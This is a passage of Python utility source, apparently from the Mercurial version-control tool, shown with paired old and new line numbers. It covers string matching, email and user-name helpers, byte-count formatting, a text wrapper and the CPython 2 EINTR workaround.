2239 N bytes from that source file object. Attempts to read past the allowed
2242 N bytes from that source file object. Attempts to read past the allowed
2240 limit are treated as EOF.
2243 limit are treated as EOF.
2241
2244
2242 It is assumed that I/O is not performed on the original file object
2245 It is assumed that I/O is not performed on the original file object
2243 in addition to I/O that is performed by this instance. If there is,
2246 in addition to I/O that is performed by this instance. If there is,
2244 state tracking will get out of sync and unexpected results will ensue.
2247 state tracking will get out of sync and unexpected results will ensue.
2245 """
2248 """
2246 def __init__(self, fh, limit):
2249 def __init__(self, fh, limit):
2247 """Allow reading up to <limit> bytes from <fh>."""
2250 """Allow reading up to <limit> bytes from <fh>."""
2248 self._fh = fh
2251 self._fh = fh
2249 self._left = limit
2252 self._left = limit
2250
2253
2251 def read(self, n=-1):
2254 def read(self, n=-1):
2252 if not self._left:
2255 if not self._left:
2253 return b''
2256 return b''
2254
2257
2255 if n < 0:
2258 if n < 0:
2256 n = self._left
2259 n = self._left
2257
2260
2258 data = self._fh.read(min(n, self._left))
2261 data = self._fh.read(min(n, self._left))
2259 self._left -= len(data)
2262 self._left -= len(data)
2260 assert self._left >= 0
2263 assert self._left >= 0
2261
2264
2262 return data
2265 return data
2263
2266
2264 def stringmatcher(pattern, casesensitive=True):
2267 def stringmatcher(pattern, casesensitive=True):
2265 """
2268 """
2266 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2269 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2267 returns the matcher name, pattern, and matcher function.
2270 returns the matcher name, pattern, and matcher function.
2268 missing or unknown prefixes are treated as literal matches.
2271 missing or unknown prefixes are treated as literal matches.
2269
2272
2270 helper for tests:
2273 helper for tests:
2271 >>> def test(pattern, *tests):
2274 >>> def test(pattern, *tests):
2272 ... kind, pattern, matcher = stringmatcher(pattern)
2275 ... kind, pattern, matcher = stringmatcher(pattern)
2273 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2276 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2274 >>> def itest(pattern, *tests):
2277 >>> def itest(pattern, *tests):
2275 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2278 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2276 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2279 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2277
2280
2278 exact matching (no prefix):
2281 exact matching (no prefix):
2279 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2282 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2280 ('literal', 'abcdefg', [False, False, True])
2283 ('literal', 'abcdefg', [False, False, True])
2281
2284
2282 regex matching ('re:' prefix)
2285 regex matching ('re:' prefix)
2283 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2286 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2284 ('re', 'a.+b', [False, False, True])
2287 ('re', 'a.+b', [False, False, True])
2285
2288
2286 force exact matches ('literal:' prefix)
2289 force exact matches ('literal:' prefix)
2287 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2290 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2288 ('literal', 're:foobar', [False, True])
2291 ('literal', 're:foobar', [False, True])
2289
2292
2290 unknown prefixes are ignored and treated as literals
2293 unknown prefixes are ignored and treated as literals
2291 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2294 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2292 ('literal', 'foo:bar', [False, False, True])
2295 ('literal', 'foo:bar', [False, False, True])
2293
2296
2294 case insensitive regex matches
2297 case insensitive regex matches
2295 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2298 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2296 ('re', 'A.+b', [False, False, True])
2299 ('re', 'A.+b', [False, False, True])
2297
2300
2298 case insensitive literal matches
2301 case insensitive literal matches
2299 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2302 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2300 ('literal', 'ABCDEFG', [False, False, True])
2303 ('literal', 'ABCDEFG', [False, False, True])
2301 """
2304 """
2302 if pattern.startswith('re:'):
2305 if pattern.startswith('re:'):
2303 pattern = pattern[3:]
2306 pattern = pattern[3:]
2304 try:
2307 try:
2305 flags = 0
2308 flags = 0
2306 if not casesensitive:
2309 if not casesensitive:
2307 flags = remod.I
2310 flags = remod.I
2308 regex = remod.compile(pattern, flags)
2311 regex = remod.compile(pattern, flags)
2309 except remod.error as e:
2312 except remod.error as e:
2310 raise error.ParseError(_('invalid regular expression: %s')
2313 raise error.ParseError(_('invalid regular expression: %s')
2311 % e)
2314 % e)
2312 return 're', pattern, regex.search
2315 return 're', pattern, regex.search
2313 elif pattern.startswith('literal:'):
2316 elif pattern.startswith('literal:'):
2314 pattern = pattern[8:]
2317 pattern = pattern[8:]
2315
2318
2316 match = pattern.__eq__
2319 match = pattern.__eq__
2317
2320
2318 if not casesensitive:
2321 if not casesensitive:
2319 ipat = encoding.lower(pattern)
2322 ipat = encoding.lower(pattern)
2320 match = lambda s: ipat == encoding.lower(s)
2323 match = lambda s: ipat == encoding.lower(s)
2321 return 'literal', pattern, match
2324 return 'literal', pattern, match
2322
2325
2323 def shortuser(user):
2326 def shortuser(user):
2324 """Return a short representation of a user name or email address."""
2327 """Return a short representation of a user name or email address."""
2325 f = user.find('@')
2328 f = user.find('@')
2326 if f >= 0:
2329 if f >= 0:
2327 user = user[:f]
2330 user = user[:f]
2328 f = user.find('<')
2331 f = user.find('<')
2329 if f >= 0:
2332 if f >= 0:
2330 user = user[f + 1:]
2333 user = user[f + 1:]
2331 f = user.find(' ')
2334 f = user.find(' ')
2332 if f >= 0:
2335 if f >= 0:
2333 user = user[:f]
2336 user = user[:f]
2334 f = user.find('.')
2337 f = user.find('.')
2335 if f >= 0:
2338 if f >= 0:
2336 user = user[:f]
2339 user = user[:f]
2337 return user
2340 return user
2338
2341
2339 def emailuser(user):
2342 def emailuser(user):
2340 """Return the user portion of an email address."""
2343 """Return the user portion of an email address."""
2341 f = user.find('@')
2344 f = user.find('@')
2342 if f >= 0:
2345 if f >= 0:
2343 user = user[:f]
2346 user = user[:f]
2344 f = user.find('<')
2347 f = user.find('<')
2345 if f >= 0:
2348 if f >= 0:
2346 user = user[f + 1:]
2349 user = user[f + 1:]
2347 return user
2350 return user
2348
2351
2349 def email(author):
2352 def email(author):
2350 '''get email of author.'''
2353 '''get email of author.'''
2351 r = author.find('>')
2354 r = author.find('>')
2352 if r == -1:
2355 if r == -1:
2353 r = None
2356 r = None
2354 return author[author.find('<') + 1:r]
2357 return author[author.find('<') + 1:r]
2355
2358
2356 def ellipsis(text, maxlength=400):
2359 def ellipsis(text, maxlength=400):
2357 """Trim string to at most maxlength (default: 400) columns in display."""
2360 """Trim string to at most maxlength (default: 400) columns in display."""
2358 return encoding.trim(text, maxlength, ellipsis='...')
2361 return encoding.trim(text, maxlength, ellipsis='...')
2359
2362
2360 def unitcountfn(*unittable):
2363 def unitcountfn(*unittable):
2361 '''return a function that renders a readable count of some quantity'''
2364 '''return a function that renders a readable count of some quantity'''
2362
2365
2363 def go(count):
2366 def go(count):
2364 for multiplier, divisor, format in unittable:
2367 for multiplier, divisor, format in unittable:
2365 if abs(count) >= divisor * multiplier:
2368 if abs(count) >= divisor * multiplier:
2366 return format % (count / float(divisor))
2369 return format % (count / float(divisor))
2367 return unittable[-1][2] % count
2370 return unittable[-1][2] % count
2368
2371
2369 return go
2372 return go
2370
2373
2371 def processlinerange(fromline, toline):
2374 def processlinerange(fromline, toline):
2372 """Check that linerange <fromline>:<toline> makes sense and return a
2375 """Check that linerange <fromline>:<toline> makes sense and return a
2373 0-based range.
2376 0-based range.
2374
2377
2375 >>> processlinerange(10, 20)
2378 >>> processlinerange(10, 20)
2376 (9, 20)
2379 (9, 20)
2377 >>> processlinerange(2, 1)
2380 >>> processlinerange(2, 1)
2378 Traceback (most recent call last):
2381 Traceback (most recent call last):
2379 ...
2382 ...
2380 ParseError: line range must be positive
2383 ParseError: line range must be positive
2381 >>> processlinerange(0, 5)
2384 >>> processlinerange(0, 5)
2382 Traceback (most recent call last):
2385 Traceback (most recent call last):
2383 ...
2386 ...
2384 ParseError: fromline must be strictly positive
2387 ParseError: fromline must be strictly positive
2385 """
2388 """
2386 if toline - fromline < 0:
2389 if toline - fromline < 0:
2387 raise error.ParseError(_("line range must be positive"))
2390 raise error.ParseError(_("line range must be positive"))
2388 if fromline < 1:
2391 if fromline < 1:
2389 raise error.ParseError(_("fromline must be strictly positive"))
2392 raise error.ParseError(_("fromline must be strictly positive"))
2390 return fromline - 1, toline
2393 return fromline - 1, toline
2391
2394
2392 bytecount = unitcountfn(
2395 bytecount = unitcountfn(
2393 (100, 1 << 30, _('%.0f GB')),
2396 (100, 1 << 30, _('%.0f GB')),
2394 (10, 1 << 30, _('%.1f GB')),
2397 (10, 1 << 30, _('%.1f GB')),
2395 (1, 1 << 30, _('%.2f GB')),
2398 (1, 1 << 30, _('%.2f GB')),
2396 (100, 1 << 20, _('%.0f MB')),
2399 (100, 1 << 20, _('%.0f MB')),
2397 (10, 1 << 20, _('%.1f MB')),
2400 (10, 1 << 20, _('%.1f MB')),
2398 (1, 1 << 20, _('%.2f MB')),
2401 (1, 1 << 20, _('%.2f MB')),
2399 (100, 1 << 10, _('%.0f KB')),
2402 (100, 1 << 10, _('%.0f KB')),
2400 (10, 1 << 10, _('%.1f KB')),
2403 (10, 1 << 10, _('%.1f KB')),
2401 (1, 1 << 10, _('%.2f KB')),
2404 (1, 1 << 10, _('%.2f KB')),
2402 (1, 1, _('%.0f bytes')),
2405 (1, 1, _('%.0f bytes')),
2403 )
2406 )
2404
2407
2405 # Matches a single EOL which can either be a CRLF where repeated CR
2408 # Matches a single EOL which can either be a CRLF where repeated CR
2406 # are removed or a LF. We do not care about old Macintosh files, so a
2409 # are removed or a LF. We do not care about old Macintosh files, so a
2407 # stray CR is an error.
2410 # stray CR is an error.
2408 _eolre = remod.compile(br'\r*\n')
2411 _eolre = remod.compile(br'\r*\n')
2409
2412
2410 def tolf(s):
2413 def tolf(s):
2411 return _eolre.sub('\n', s)
2414 return _eolre.sub('\n', s)
2412
2415
2413 def tocrlf(s):
2416 def tocrlf(s):
2414 return _eolre.sub('\r\n', s)
2417 return _eolre.sub('\r\n', s)
2415
2418
2416 if pycompat.oslinesep == '\r\n':
2419 if pycompat.oslinesep == '\r\n':
2417 tonativeeol = tocrlf
2420 tonativeeol = tocrlf
2418 fromnativeeol = tolf
2421 fromnativeeol = tolf
2419 else:
2422 else:
2420 tonativeeol = pycompat.identity
2423 tonativeeol = pycompat.identity
2421 fromnativeeol = pycompat.identity
2424 fromnativeeol = pycompat.identity
2422
2425
2423 def escapestr(s):
2426 def escapestr(s):
2424 # call underlying function of s.encode('string_escape') directly for
2427 # call underlying function of s.encode('string_escape') directly for
2425 # Python 3 compatibility
2428 # Python 3 compatibility
2426 return codecs.escape_encode(s)[0]
2429 return codecs.escape_encode(s)[0]
2427
2430
2428 def unescapestr(s):
2431 def unescapestr(s):
2429 return codecs.escape_decode(s)[0]
2432 return codecs.escape_decode(s)[0]
2430
2433
2431 def forcebytestr(obj):
2434 def forcebytestr(obj):
2432 """Portably format an arbitrary object (e.g. exception) into a byte
2435 """Portably format an arbitrary object (e.g. exception) into a byte
2433 string."""
2436 string."""
2434 try:
2437 try:
2435 return pycompat.bytestr(obj)
2438 return pycompat.bytestr(obj)
2436 except UnicodeEncodeError:
2439 except UnicodeEncodeError:
2437 # non-ascii string, may be lossy
2440 # non-ascii string, may be lossy
2438 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2441 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2439
2442
2440 def uirepr(s):
2443 def uirepr(s):
2441 # Avoid double backslash in Windows path repr()
2444 # Avoid double backslash in Windows path repr()
2442 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2445 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2443
2446
2444 # delay import of textwrap
2447 # delay import of textwrap
2445 def MBTextWrapper(**kwargs):
2448 def MBTextWrapper(**kwargs):
2446 class tw(textwrap.TextWrapper):
2449 class tw(textwrap.TextWrapper):
2447 """
2450 """
2448 Extend TextWrapper for width-awareness.
2451 Extend TextWrapper for width-awareness.
2449
2452
2450 Neither number of 'bytes' in any encoding nor 'characters' is
2453 Neither number of 'bytes' in any encoding nor 'characters' is
2451 appropriate to calculate terminal columns for specified string.
2454 appropriate to calculate terminal columns for specified string.
2452
2455
2453 Original TextWrapper implementation uses built-in 'len()' directly,
2456 Original TextWrapper implementation uses built-in 'len()' directly,
2454 so overriding is needed to use width information of each characters.
2457 so overriding is needed to use width information of each characters.
2455
2458
2456 In addition, characters classified into 'ambiguous' width are
2459 In addition, characters classified into 'ambiguous' width are
2457 treated as wide in East Asian area, but as narrow in other.
2460 treated as wide in East Asian area, but as narrow in other.
2458
2461
2459 This requires use decision to determine width of such characters.
2462 This requires use decision to determine width of such characters.
2460 """
2463 """
2461 def _cutdown(self, ucstr, space_left):
2464 def _cutdown(self, ucstr, space_left):
2462 l = 0
2465 l = 0
2463 colwidth = encoding.ucolwidth
2466 colwidth = encoding.ucolwidth
2464 for i in xrange(len(ucstr)):
2467 for i in xrange(len(ucstr)):
2465 l += colwidth(ucstr[i])
2468 l += colwidth(ucstr[i])
2466 if space_left < l:
2469 if space_left < l:
2467 return (ucstr[:i], ucstr[i:])
2470 return (ucstr[:i], ucstr[i:])
2468 return ucstr, ''
2471 return ucstr, ''
2469
2472
2470 # overriding of base class
2473 # overriding of base class
2471 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2474 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2472 space_left = max(width - cur_len, 1)
2475 space_left = max(width - cur_len, 1)
2473
2476
2474 if self.break_long_words:
2477 if self.break_long_words:
2475 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2478 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2476 cur_line.append(cut)
2479 cur_line.append(cut)
2477 reversed_chunks[-1] = res
2480 reversed_chunks[-1] = res
2478 elif not cur_line:
2481 elif not cur_line:
2479 cur_line.append(reversed_chunks.pop())
2482 cur_line.append(reversed_chunks.pop())
2480
2483
2481 # this overriding code is imported from TextWrapper of Python 2.6
2484 # this overriding code is imported from TextWrapper of Python 2.6
2482 # to calculate columns of string by 'encoding.ucolwidth()'
2485 # to calculate columns of string by 'encoding.ucolwidth()'
2483 def _wrap_chunks(self, chunks):
2486 def _wrap_chunks(self, chunks):
2484 colwidth = encoding.ucolwidth
2487 colwidth = encoding.ucolwidth
2485
2488
2486 lines = []
2489 lines = []
2487 if self.width <= 0:
2490 if self.width <= 0:
2488 raise ValueError("invalid width %r (must be > 0)" % self.width)
2491 raise ValueError("invalid width %r (must be > 0)" % self.width)
2489
2492
2490 # Arrange in reverse order so items can be efficiently popped
2493 # Arrange in reverse order so items can be efficiently popped
2491 # from a stack of chucks.
2494 # from a stack of chucks.
2492 chunks.reverse()
2495 chunks.reverse()
2493
2496
2494 while chunks:
2497 while chunks:
2495
2498
2496 # Start the list of chunks that will make up the current line.
2499 # Start the list of chunks that will make up the current line.
2497 # cur_len is just the length of all the chunks in cur_line.
2500 # cur_len is just the length of all the chunks in cur_line.
2498 cur_line = []
2501 cur_line = []
2499 cur_len = 0
2502 cur_len = 0
2500
2503
2501 # Figure out which static string will prefix this line.
2504 # Figure out which static string will prefix this line.
2502 if lines:
2505 if lines:
2503 indent = self.subsequent_indent
2506 indent = self.subsequent_indent
2504 else:
2507 else:
2505 indent = self.initial_indent
2508 indent = self.initial_indent
2506
2509
2507 # Maximum width for this line.
2510 # Maximum width for this line.
2508 width = self.width - len(indent)
2511 width = self.width - len(indent)
2509
2512
2510 # First chunk on line is whitespace -- drop it, unless this
2513 # First chunk on line is whitespace -- drop it, unless this
2511 # is the very beginning of the text (i.e. no lines started yet).
2514 # is the very beginning of the text (i.e. no lines started yet).
2512 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2515 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2513 del chunks[-1]
2516 del chunks[-1]
2514
2517
2515 while chunks:
2518 while chunks:
2516 l = colwidth(chunks[-1])
2519 l = colwidth(chunks[-1])
2517
2520
2518 # Can at least squeeze this chunk onto the current line.
2521 # Can at least squeeze this chunk onto the current line.
2519 if cur_len + l <= width:
2522 if cur_len + l <= width:
2520 cur_line.append(chunks.pop())
2523 cur_line.append(chunks.pop())
2521 cur_len += l
2524 cur_len += l
2522
2525
2523 # Nope, this line is full.
2526 # Nope, this line is full.
2524 else:
2527 else:
2525 break
2528 break
2526
2529
2527 # The current line is full, and the next chunk is too big to
2530 # The current line is full, and the next chunk is too big to
2528 # fit on *any* line (not just this one).
2531 # fit on *any* line (not just this one).
2529 if chunks and colwidth(chunks[-1]) > width:
2532 if chunks and colwidth(chunks[-1]) > width:
2530 self._handle_long_word(chunks, cur_line, cur_len, width)
2533 self._handle_long_word(chunks, cur_line, cur_len, width)
2531
2534
2532 # If the last chunk on this line is all whitespace, drop it.
2535 # If the last chunk on this line is all whitespace, drop it.
2533 if (self.drop_whitespace and
2536 if (self.drop_whitespace and
2534 cur_line and cur_line[-1].strip() == r''):
2537 cur_line and cur_line[-1].strip() == r''):
2535 del cur_line[-1]
2538 del cur_line[-1]
2536
2539
2537 # Convert current line back to a string and store it in list
2540 # Convert current line back to a string and store it in list
2538 # of all lines (return value).
2541 # of all lines (return value).
2539 if cur_line:
2542 if cur_line:
2540 lines.append(indent + r''.join(cur_line))
2543 lines.append(indent + r''.join(cur_line))
2541
2544
2542 return lines
2545 return lines
2543
2546
2544 global MBTextWrapper
2547 global MBTextWrapper
2545 MBTextWrapper = tw
2548 MBTextWrapper = tw
2546 return tw(**kwargs)
2549 return tw(**kwargs)
2547
2550
2548 def wrap(line, width, initindent='', hangindent=''):
2551 def wrap(line, width, initindent='', hangindent=''):
2549 maxindent = max(len(hangindent), len(initindent))
2552 maxindent = max(len(hangindent), len(initindent))
2550 if width <= maxindent:
2553 if width <= maxindent:
2551 # adjust for weird terminal size
2554 # adjust for weird terminal size
2552 width = max(78, maxindent + 1)
2555 width = max(78, maxindent + 1)
2553 line = line.decode(pycompat.sysstr(encoding.encoding),
2556 line = line.decode(pycompat.sysstr(encoding.encoding),
2554 pycompat.sysstr(encoding.encodingmode))
2557 pycompat.sysstr(encoding.encodingmode))
2555 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2558 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2556 pycompat.sysstr(encoding.encodingmode))
2559 pycompat.sysstr(encoding.encodingmode))
2557 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2560 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2558 pycompat.sysstr(encoding.encodingmode))
2561 pycompat.sysstr(encoding.encodingmode))
2559 wrapper = MBTextWrapper(width=width,
2562 wrapper = MBTextWrapper(width=width,
2560 initial_indent=initindent,
2563 initial_indent=initindent,
2561 subsequent_indent=hangindent)
2564 subsequent_indent=hangindent)
2562 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2565 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2563
2566
2564 if (pyplatform.python_implementation() == 'CPython' and
2567 if (pyplatform.python_implementation() == 'CPython' and
2565 sys.version_info < (3, 0)):
2568 sys.version_info < (3, 0)):
2566 # There is an issue in CPython that some IO methods do not handle EINTR
2569 # There is an issue in CPython that some IO methods do not handle EINTR
2567 # correctly. The following table shows what CPython version (and functions)
2570 # correctly. The following table shows what CPython version (and functions)
2568 # are affected (buggy: has the EINTR bug, okay: otherwise):
2571 # are affected (buggy: has the EINTR bug, okay: otherwise):
2569 #
2572 #
2570 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2573 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2571 # --------------------------------------------------
2574 # --------------------------------------------------
2572 # fp.__iter__ | buggy | buggy | okay
2575 # fp.__iter__ | buggy | buggy | okay
2573 # fp.read* | buggy | okay [1] | okay
2576 # fp.read* | buggy | okay [1] | okay
2574 #
2577 #
2575 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2578 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2576 #
2579 #
2577 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2580 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2578 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2581 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2579 #
2582 #
2580 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2583 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2581 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2584 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2582 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2585 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2583 # fp.__iter__ but not other fp.read* methods.
2586 # fp.__iter__ but not other fp.read* methods.
2584 #
2587 #
2585 # On modern systems like Linux, the "read" syscall cannot be interrupted
2588 # On modern systems like Linux, the "read" syscall cannot be interrupted
2586 # when reading "fast" files like on-disk files. So the EINTR issue only
2589 # when reading "fast" files like on-disk files. So the EINTR issue only
2587 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2590 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2588 # files approximately as "fast" files and use the fast (unsafe) code path,
2591 # files approximately as "fast" files and use the fast (unsafe) code path,
2589 # to minimize the performance impact.
2592 # to minimize the performance impact.
2590 if sys.version_info >= (2, 7, 4):
2593 if sys.version_info >= (2, 7, 4):
2591 # fp.readline deals with EINTR correctly, use it as a workaround.
2594 # fp.readline deals with EINTR correctly, use it as a workaround.
2592 def _safeiterfile(fp):
2595 def _safeiterfile(fp):
2593 return iter(fp.readline, '')
2596 return iter(fp.readline, '')
2594 else:
2597 else:
2595 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2598 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2596 # note: this may block longer than necessary because of bufsize.
2599 # note: this may block longer than necessary because of bufsize.
2597 def _safeiterfile(fp, bufsize=4096):
2600 def _safeiterfile(fp, bufsize=4096):
2598 fd = fp.fileno()
2601 fd = fp.fileno()
2599 line = ''
2602 line = ''
2600 while True:
2603 while True:
2601 try:
2604 try:
2602 buf = os.read(fd, bufsize)
2605 buf = os.read(fd, bufsize)
2603 except OSError as ex:
2606 except OSError as ex:
2604 # os.read only raises EINTR before any data is read
2607 # os.read only raises EINTR before any data is read
2605 if ex.errno == errno.EINTR:
2608 if ex.errno == errno.EINTR:
2606 continue
2609 continue
2607 else:
2610 else:
2608 raise
2611 raise
2609 line += buf
2612 line += buf
2610 if '\n' in buf:
2613 if '\n' in buf:
2611 splitted = line.splitlines(True)
2614 splitted = line.splitlines(True)
2612 line = ''
2615 line = ''
2613 for l in splitted:
2616 for l in splitted:
2614 if l[-1] == '\n':
2617 if l[-1] == '\n':
2615 yield l
2618 yield l
2616 else:
2619 else:
2617 line = l
2620 line = l
2618 if not buf:
2621 if not buf:
2619 break
2622 break
2620 if line:
2623 if line:
2621 yield line
2624 yield line
2622
2625
2623 def iterfile(fp):
2626 def iterfile(fp):
2624 fastpath = True
2627 fastpath = True
2625 if type(fp) is file:
2628 if type(fp) is file:
2626 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2629 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2627 if fastpath:
2630 if fastpath:
2628 return fp
2631 return fp
2629 else:
2632 else:
2630 return _safeiterfile(fp)
2633 return _safeiterfile(fp)
2631 else:
2634 else:
2632 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2635 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2633 def iterfile(fp):
2636 def iterfile(fp):
2634 return fp
2637 return fp
2635
2638
2636 def iterlines(iterator):
2639 def iterlines(iterator):
2637 for chunk in iterator:
2640 for chunk in iterator:
2638 for line in chunk.splitlines():
2641 for line in chunk.splitlines():
2639 yield line
2642 yield line
2640
2643
2641 def expandpath(path):
2644 def expandpath(path):
2642 return os.path.expanduser(os.path.expandvars(path))
2645 return os.path.expanduser(os.path.expandvars(path))
2643
2646
2644 def hgcmd():
2647 def hgcmd():
2645 """Return the command used to execute current hg
2648 """Return the command used to execute current hg
2646
2649
2647 This is different from hgexecutable() because on Windows we want
2650 This is different from hgexecutable() because on Windows we want
2648 to avoid things opening new shell windows like batch files, so we
2651 to avoid things opening new shell windows like batch files, so we
2649 get either the python call or current executable.
2652 get either the python call or current executable.
2650 """
2653 """
2651 if mainfrozen():
2654 if mainfrozen():
2652 if getattr(sys, 'frozen', None) == 'macosx_app':
2655 if getattr(sys, 'frozen', None) == 'macosx_app':
2653 # Env variable set by py2app
2656 # Env variable set by py2app
2654 return [encoding.environ['EXECUTABLEPATH']]
2657 return [encoding.environ['EXECUTABLEPATH']]
2655 else:
2658 else:
2656 return [pycompat.sysexecutable]
2659 return [pycompat.sysexecutable]
2657 return gethgcmd()
2660 return gethgcmd()
2658
2661
2659 def rundetached(args, condfn):
2662 def rundetached(args, condfn):
2660 """Execute the argument list in a detached process.
2663 """Execute the argument list in a detached process.
2661
2664
2662 condfn is a callable which is called repeatedly and should return
2665 condfn is a callable which is called repeatedly and should return
2663 True once the child process is known to have started successfully.
2666 True once the child process is known to have started successfully.
2664 At this point, the child process PID is returned. If the child
2667 At this point, the child process PID is returned. If the child
2665 process fails to start or finishes before condfn() evaluates to
2668 process fails to start or finishes before condfn() evaluates to
2666 True, return -1.
2669 True, return -1.
2667 """
2670 """
2668 # Windows case is easier because the child process is either
2671 # Windows case is easier because the child process is either
2669 # successfully starting and validating the condition or exiting
2672 # successfully starting and validating the condition or exiting
2670 # on failure. We just poll on its PID. On Unix, if the child
2673 # on failure. We just poll on its PID. On Unix, if the child
2671 # process fails to start, it will be left in a zombie state until
2674 # process fails to start, it will be left in a zombie state until
2672 # the parent wait on it, which we cannot do since we expect a long
2675 # the parent wait on it, which we cannot do since we expect a long
2673 # running process on success. Instead we listen for SIGCHLD telling
2676 # running process on success. Instead we listen for SIGCHLD telling
2674 # us our child process terminated.
2677 # us our child process terminated.
2675 terminated = set()
2678 terminated = set()
2676 def handler(signum, frame):
2679 def handler(signum, frame):
2677 terminated.add(os.wait())
2680 terminated.add(os.wait())
2678 prevhandler = None
2681 prevhandler = None
2679 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2682 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2680 if SIGCHLD is not None:
2683 if SIGCHLD is not None:
2681 prevhandler = signal.signal(SIGCHLD, handler)
2684 prevhandler = signal.signal(SIGCHLD, handler)
2682 try:
2685 try:
2683 pid = spawndetached(args)
2686 pid = spawndetached(args)
2684 while not condfn():
2687 while not condfn():
2685 if ((pid in terminated or not testpid(pid))
2688 if ((pid in terminated or not testpid(pid))
2686 and not condfn()):
2689 and not condfn()):
2687 return -1
2690 return -1
2688 time.sleep(0.1)
2691 time.sleep(0.1)
2689 return pid
2692 return pid
2690 finally:
2693 finally:
2691 if prevhandler is not None:
2694 if prevhandler is not None:
2692 signal.signal(signal.SIGCHLD, prevhandler)
2695 signal.signal(signal.SIGCHLD, prevhandler)
2693
2696
2694 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2697 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2695 """Return the result of interpolating items in the mapping into string s.
2698 """Return the result of interpolating items in the mapping into string s.
2696
2699
2697 prefix is a single character string, or a two character string with
2700 prefix is a single character string, or a two character string with
2698 a backslash as the first character if the prefix needs to be escaped in
2701 a backslash as the first character if the prefix needs to be escaped in
2699 a regular expression.
2702 a regular expression.
2700
2703
2701 fn is an optional function that will be applied to the replacement text
2704 fn is an optional function that will be applied to the replacement text
2702 just before replacement.
2705 just before replacement.
2703
2706
2704 escape_prefix is an optional flag that allows using doubled prefix for
2707 escape_prefix is an optional flag that allows using doubled prefix for
2705 its escaping.
2708 its escaping.
2706 """
2709 """
2707 fn = fn or (lambda s: s)
2710 fn = fn or (lambda s: s)
2708 patterns = '|'.join(mapping.keys())
2711 patterns = '|'.join(mapping.keys())
2709 if escape_prefix:
2712 if escape_prefix:
2710 patterns += '|' + prefix
2713 patterns += '|' + prefix
2711 if len(prefix) > 1:
2714 if len(prefix) > 1:
2712 prefix_char = prefix[1:]
2715 prefix_char = prefix[1:]
2713 else:
2716 else:
2714 prefix_char = prefix
2717 prefix_char = prefix
2715 mapping[prefix_char] = prefix_char
2718 mapping[prefix_char] = prefix_char
2716 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2719 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2717 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2720 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2718
2721
2719 def getport(port):
2722 def getport(port):
2720 """Return the port for a given network service.
2723 """Return the port for a given network service.
2721
2724
2722 If port is an integer, it's returned as is. If it's a string, it's
2725 If port is an integer, it's returned as is. If it's a string, it's
2723 looked up using socket.getservbyname(). If there's no matching
2726 looked up using socket.getservbyname(). If there's no matching
2724 service, error.Abort is raised.
2727 service, error.Abort is raised.
2725 """
2728 """
2726 try:
2729 try:
2727 return int(port)
2730 return int(port)
2728 except ValueError:
2731 except ValueError:
2729 pass
2732 pass
2730
